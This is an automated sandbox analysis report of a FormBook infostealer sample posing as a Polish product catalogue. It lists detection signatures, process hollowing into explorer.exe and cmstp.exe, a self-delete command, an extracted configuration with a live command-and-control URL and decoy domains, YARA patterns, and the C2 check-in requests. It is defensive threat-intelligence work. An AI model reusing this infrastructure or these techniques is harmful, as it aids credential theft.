Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nowy przyk#U0142adowy katalog.exe

Overview

General Information

Sample Name:nowy przyk#U0142adowy katalog.exe
Analysis ID:515499
MD5:cbe0e49106fad96b2c1c155ce5b22abd
SHA1:25a9a38c80446b631fc1de30440caba41ff8ec74
SHA256:a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • nowy przyk#U0142adowy katalog.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
    • nowy przyk#U0142adowy katalog.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5632 cmdline: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5596, ProcessCommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", ProcessId: 5632

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: bezhantrading.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dllReversingLabs: Detection: 13%
          Machine Learning detection for sampleShow sources
          Source: nowy przyk#U0142adowy katalog.exeJoe Sandbox ML: detected
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.4b5796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.3bbc28.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,0_2_10002F80
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop esi1_2_00415854
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop edi1_2_004162C4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop esi1_1_00415854
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 4x nop then pop edi1_1_004162C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi11_2_029762C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi11_2_02975854

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.248.163.187 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tankomixing.com
          Source: C:\Windows\explorer.exeDomain query: www.leads-mania.club
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.33 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bezhantrading.com
          Source: C:\Windows\explorer.exeDomain query: www.americanvisionvinyl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.iccsukltd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.affiliatemarketingproducts.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 153.127.214.206 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 138.68.74.116 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.worryterrible.space
          Source: C:\Windows\explorer.exeDomain query: www.alles-abgedeckt.com
          Source: C:\Windows\explorer.exeDomain query: www.dempseynutrition.com
          Source: C:\Windows\explorer.exeDomain query: www.harada-insatsu.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.affiliatemarketingproducts.xyz
          Source: DNS query: www.sddn13.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.bezhantrading.com/wtcv/
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1Host: www.worryterrible.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.americanvisionvinyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1Host: www.iccsukltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.harada-insatsu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.affiliatemarketingproducts.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.bezhantrading.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1Host: www.alles-abgedeckt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1Host: www.leads-mania.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1Host: www.tankomixing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 04 Nov 2021 10:49:10 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ae77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 04 Nov 2021 10:49:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182b3d6-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
